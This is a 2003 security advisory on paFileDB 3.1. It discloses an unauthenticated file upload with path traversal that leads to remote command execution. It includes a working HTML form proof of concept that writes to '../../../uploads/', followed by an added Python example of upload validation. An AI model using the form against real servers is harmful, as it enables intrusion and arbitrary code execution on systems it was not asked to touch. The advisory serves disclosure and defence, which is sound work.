paFileDB 3.1 OS-Cmd execution

[24.07.2003] paFileDB 3.1 OS-Cmd execution

 

============================

Security REPORT paFileDB 3.1

============================

 

Product: paFileDB Version 3.1 (and earlier)

Vulnerabilities: arbitrary file upload, path traversal, arbitrary OS command execution

Vuln.-classes: www.owasp.org/asac/parameter_manipulation/forms.shtml

www.owasp.org/asac/input_validation/os.shtml

www.owasp.org/asac/input_validation/pt.shtml

Vendor: php arena (http://www.phparena.net/)

Vendor-Status: contacted through the mail form (http://www.phparena.net/mail.php) on 26.06.2003

Vendor-Patch: forums.phparena.net/index.php

 

Exploitable:

Local: NO

Remote: YES

 

============

Introduction

============

 

(taken from website)

---*---

paFileDB is designed to allow webmasters to have a database of files for download on their site. To add a download, all you do is upload the file using FTP or whatever method you use, log into paFileDB's admin center, and fill out a form to add a file.

---*---

 

 

=====================

Vulnerability Details

=====================

 

 

1) ARBITRARY FILE UPLOAD

========================

 

The script "/includes/team/file.php" (and possibly others) does not check for a valid session.

Therefore it is possible to upload arbitrary files, to an attacker-chosen location, by creating or modifying a single form parameter.

 

Form-example:

---*---
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" TYPE="file">
<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish">
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type="submit" name="submit" value="doit">
</form>
</body></html>
---*---

 

2) ARBITRARY OS-COMMAND EXECUTION

=================================

 

Arbitrary OS commands can be executed by uploading program or script files through the unauthenticated upload described in 1).
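The following is an added example, not part of the original advisory and not paFileDB's own code. It shows the server-side checks whose absence produces both findings above: an authenticated-session gate before any upload is processed, reduction of the client-supplied userfile_name to a single safe path component (which defeats the "../../../uploads/..." value from the form), an extension allow-list so program or script files are refused, and a final containment check of the resolved path under the upload directory. It is written in Python rather than the product's PHP so that it runs stand-alone; UPLOAD_ROOT, ALLOWED_EXTENSIONS, the session dict and all function names are assumptions made for the example.

```python
import os
import re

# Constructed upload root for the example; the advisory only gives paths
# relative to /pafiledb/, so this value is an assumption.
UPLOAD_ROOT = "/var/www/pafiledb/uploads"

# Assumed allow-list: a download archive should accept data files, never
# anything the web server might interpret as code.
ALLOWED_EXTENSIONS = {"zip", "tar", "gz", "pdf", "txt"}

# Anything outside this character set is replaced in the stored file name.
_SAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def require_admin_session(session):
    """Gate the upload on an existing authenticated team/admin session.

    `session` is a plain dict standing in for PHP's $_SESSION (assumption).
    The advisory's finding 1) is exactly this check being absent.
    """
    return bool(session) and session.get("authenticated") is True


def sanitize_filename(user_supplied):
    """Reduce a client-supplied name to one safe path component.

    Directory parts (including "../" sequences) are discarded, unsafe
    characters are replaced, and only allow-listed extensions survive.
    Raises ValueError when no acceptable name can be derived.
    """
    # Treat backslashes as separators too, then keep only the last component.
    name = os.path.basename(user_supplied.replace("\\", "/"))
    name = _SAFE_CHARS.sub("_", name)
    if name in ("", ".", ".."):
        raise ValueError("empty or dot-only file name")
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {ext!r} not allowed")
    return name


def resolve_upload_target(user_supplied, upload_root=UPLOAD_ROOT):
    """Build the destination path and prove it stays inside upload_root.

    The sanitizer already removes directory parts; this containment check on
    the resolved path is defence in depth against anything it missed.
    """
    name = sanitize_filename(user_supplied)
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes upload root")
    return target


def handle_upload(session, user_supplied_name):
    """Mimic the decision an upload handler should take.

    Returns (http_status, target_path): 403 without a session, 400 for a
    rejected name, 200 with the path the file may be written to.
    """
    if not require_admin_session(session):
        return (403, None)
    try:
        return (200, resolve_upload_target(user_supplied_name))
    except ValueError:
        return (400, None)


if __name__ == "__main__":
    # Constructed requests: the advisory's traversal value, a script, and a
    # harmless archive, each with and without a session.
    for sess in ({}, {"authenticated": True}):
        for name in ("../../../uploads/makeawish", "shell.php", "docs/report.zip"):
            print(sess, repr(name), "->", handle_upload(sess, name))
```

Run it directly to see the decision for each constructed request; in a real handler the 200 branch is the only place a file is ever written, and the write goes to the returned path, never to a name taken from the form.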

 

 

 

Severity: HIGH

 

 

=======

Remarks

=======

 

---

 

====================

Recommended Hotfixes

====================

 

Apply the vendor's software patch (see Vendor-Patch above).

 

 

EOF Martin Eiszner / @2003WebSec.org

 

 

=======

Contact

=======

 

SEC Consult Unternehmensberatung GmbH / Martin Eiszner

Blindengasse 3

1080 Vienna

 

Austria / EUROPE

 

m dot eiszner at sec-consult dot com

www.sec-consult.com